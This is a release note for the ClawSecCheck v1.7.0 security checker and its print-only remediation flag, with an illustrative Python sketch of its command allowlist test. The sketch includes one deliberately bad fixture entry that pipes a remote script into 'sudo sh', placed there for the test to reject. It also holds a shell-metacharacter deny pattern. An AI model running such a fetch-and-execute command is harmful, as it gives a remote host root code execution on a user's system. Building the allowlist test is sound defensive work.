ClawSecCheck v1.7.0

Paste-ready remediation (`--fix`). The exact fix commands were already in each finding's prose; now they're extracted into a copy-paste block. ClawSecCheck stays read-only: `--fix` only prints remediation; it never applies anything (the name promises a check). Config fixes are given as `set <dotted-path> → <value>` guidance so you edit your own `openclaw.json`, never a paste-over JSON blob that could clobber neighbouring keys.
Added

- `--fix`: prints paste-ready remediation for current FAIL/WARN findings: exact shell commands (allowlisted verbs only, `chmod`/`openclaw`; no destructive or network commands) and config path+value guidance. The header states plainly that ClawSecCheck does not apply them.
- `catalog.REMEDIATION` + `remediation_for(id)`: single source of truth, authored only for checks with a safe, deterministic, grounded fix (config dotted paths verified against the real schema, §4). Checks needing manual review keep their prose fix.
- `--json` exposes `"remediation": {commands, config}` per finding; SARIF results carry a `fixes` array (description-only, no `artifactChanges`, since nothing is auto-edited).
Notes

- Additive only: no verdict, score, or check behaviour changed; grades unchanged on the fixture corpus. A safety test enforces the command allowlist (no `rm`/`curl`/`sudo`/pipes/etc.).
- Workspace-specific paths use documented `<placeholder>` forms rather than auto-substituting a path guessed from evidence (never `chmod` the wrong thing, §5).
- Out of scope (deliberately): an auto-apply `--apply` (would need to be opt-in and confirmation-gated, §2) and a paste-over JSON patch (clobber risk).
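As an added illustration of the design described in the Added and Notes sections (the remediation catalog, the verb allowlist the safety test enforces, `<placeholder>` paths, and the description-only SARIF `fixes` entry), here is a small Python sketch. It is not ClawSecCheck's own code: the check ids, commands, config paths, placeholder name and function bodies are all constructed for this example, and only the `chmod`/`openclaw` allowlist and the no-`rm`/`curl`/`sudo`/pipes rule come from the release note.

```python
"""Hypothetical sketch of a print-only remediation catalog with an allowlist
safety test. Not ClawSecCheck's code; ids, commands and paths are constructed."""
import re
import shlex

# Constructed catalog. Keys are made-up check ids; values are the exact strings
# that would be printed, never executed. Config entries are dotted-path + value.
REMEDIATION = {
    "FS-001": {"commands": ["chmod 600 <workspace>/openclaw.json"], "config": []},
    "CFG-002": {"commands": [], "config": [{"path": "gateway.allowInsecure", "value": False}]},
    # Deliberately bad entry so the safety test below has something to reject.
    "BAD-999": {"commands": ["curl -s http://example.invalid/fix.sh | sudo sh"], "config": []},
}

ALLOWED_VERBS = {"chmod", "openclaw"}          # the only verbs the note allows
SHELL_METACHARS = re.compile(r"[|;&`$<>\n]")    # pipes, chaining, substitution
PLACEHOLDER = re.compile(r"<[a-z][a-z_-]*>")    # documented <placeholder> forms
DOTTED_PATH = re.compile(r"^[A-Za-z_]\w*(\.[A-Za-z_]\w*)+$")


def remediation_for(check_id):
    """Remediation dict for a check id, or None when the check keeps prose-only
    guidance because no safe, deterministic fix exists."""
    return REMEDIATION.get(check_id)


def command_problems(cmd):
    """Reasons a command would fail the allowlist safety test ([] = acceptable).
    Placeholders are masked first so their angle brackets are not mistaken for
    shell redirection."""
    problems = []
    masked = PLACEHOLDER.sub("PLACEHOLDER", cmd)
    if SHELL_METACHARS.search(masked):
        problems.append("shell metacharacter (pipe/chain/redirect/substitution)")
    tokens = shlex.split(masked)
    verb = tokens[0] if tokens else ""
    if verb not in ALLOWED_VERBS:
        problems.append(f"verb not allowlisted: {verb!r}")
    return problems


def config_problems(entry):
    """Config guidance must be a dotted path plus a value, so the user edits
    one key in their own openclaw.json instead of pasting over a JSON blob."""
    problems = []
    if not DOTTED_PATH.match(entry.get("path", "")):
        problems.append(f"not a dotted path: {entry.get('path')!r}")
    if "value" not in entry:
        problems.append("missing value")
    return problems


def safety_test(catalog=REMEDIATION):
    """Mirror of the allowlist safety test: {check_id: [problems]} for every
    catalog entry that must not ship. An empty dict means the catalog is clean."""
    failures = {}
    for check_id, rem in catalog.items():
        problems = [p for cmd in rem["commands"] for p in command_problems(cmd)]
        problems += [p for entry in rem["config"] for p in config_problems(entry)]
        if problems:
            failures[check_id] = problems
    return failures


def config_line(entry):
    return f"set {entry['path']} -> {entry['value']!r}"


def render_fix_block(finding_ids, catalog=REMEDIATION):
    """Paste-ready text as a --fix style flag would print it: a header that says
    nothing is applied, then per-finding commands and config guidance."""
    lines = ["# ClawSecCheck does NOT apply these; review and run them yourself."]
    for check_id in finding_ids:
        rem = catalog.get(check_id)
        if rem is None:
            lines.append(f"# {check_id}: manual review, see the finding text")
            continue
        lines.append(f"# {check_id}")
        lines += rem["commands"] + ["# " + config_line(c) for c in rem["config"]]
    return "\n".join(lines)


def sarif_fixes(check_id, catalog=REMEDIATION):
    """SARIF 'fixes' array for one result: description only, no artifactChanges,
    because the tool never edits files."""
    rem = catalog.get(check_id)
    if rem is None:
        return []
    text = "; ".join(rem["commands"] + [config_line(c) for c in rem["config"]])
    return [{"description": {"text": text}}]


if __name__ == "__main__":
    print(render_fix_block(["FS-001", "CFG-002", "UNKNOWN-1"]))
    print("safety test failures:", safety_test())
```

The safety test is the interesting part: it rejects a command on either of two grounds, a verb outside the allowlist or any shell metacharacter that could chain a second command onto an allowlisted one, and it masks documented `<placeholder>` tokens before the metacharacter check so the placeholder form itself stays legal.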